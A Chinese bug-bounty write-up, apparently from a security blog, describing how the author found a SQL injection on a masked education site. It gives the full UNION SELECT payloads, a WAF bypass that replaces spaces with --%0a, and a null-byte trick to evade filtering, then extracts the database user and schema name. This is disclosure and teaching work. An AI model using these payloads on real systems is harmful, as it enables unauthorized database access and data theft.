记一次挖掘某SRC漏洞的思路 – 作者:a1412666499

漏洞已修复 只是分享一下自己挖掘过程的思路来提供大家学习

打开网站,www.xxedu.cn 发现最上面有个输入框

判断注入

输入一个单元号图片[1]-记一次挖掘某SRC漏洞的思路 – 作者:a1412666499-安全小百科

页面报错图片[2]-记一次挖掘某SRC漏洞的思路 – 作者:a1412666499-安全小百科

两个则正常图片[3]-记一次挖掘某SRC漏洞的思路 – 作者:a1412666499-安全小百科

判断列数

首先闭合,这里程序使用的是thinkphp,查询时候会用小括号包裹,所以首先用’)闭合

1 keywords=1′) %23

图片[4]-记一次挖掘某SRC漏洞的思路 – 作者:a1412666499-安全小百科

order by x被拦截,用–%0a代替空格即可

图片[5]-记一次挖掘某SRC漏洞的思路 – 作者:a1412666499-安全小百科

27报错代表只有26行

图片[6]-记一次挖掘某SRC漏洞的思路 – 作者:a1412666499-安全小百科

联合注入

直接上union select会一直卡着没有任何返回

图片[7]-记一次挖掘某SRC漏洞的思路 – 作者:a1412666499-安全小百科

把空格都改为–%0a,成功响应

图片[8]-记一次挖掘某SRC漏洞的思路 – 作者:a1412666499-安全小百科

在select跟1,2,3…之间用两个–%0a负责会无响应

1 =1′)‐‐%0aunion‐‐%0aselect‐‐%0a‐‐%0a1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,1

6,17,18,19,20,21,22,23,24,25,26

但是发现还是响应错误,这里就猜测是错误跟拦截响应都相同

图片[9]-记一次挖掘某SRC漏洞的思路 – 作者:a1412666499-安全小百科

联合注入Bypass

在1后面加上%00并url编码,原理是waf把空字节认为是结束导致了后面的语句可以绕过

1 1%00′)‐‐%0aunion‐‐%0aselect‐‐%0a‐‐%0a1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,

16,17,18,19,20,21,22,23,24,25,26

2 %23

图片[10]-记一次挖掘某SRC漏洞的思路 – 作者:a1412666499-安全小百科

得到回显点为4

图片[11]-记一次挖掘某SRC漏洞的思路 – 作者:a1412666499-安全小百科

使用user–%0a()得到用户cse

图片[12]-记一次挖掘某SRC漏洞的思路 – 作者:a1412666499-安全小百科

SCHEMA–%0a()得到数据库cse

图片[13]-记一次挖掘某SRC漏洞的思路 – 作者:a1412666499-安全小百科

来源:freebuf.com 2020-09-23 11:22:29 by: a1412666499

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论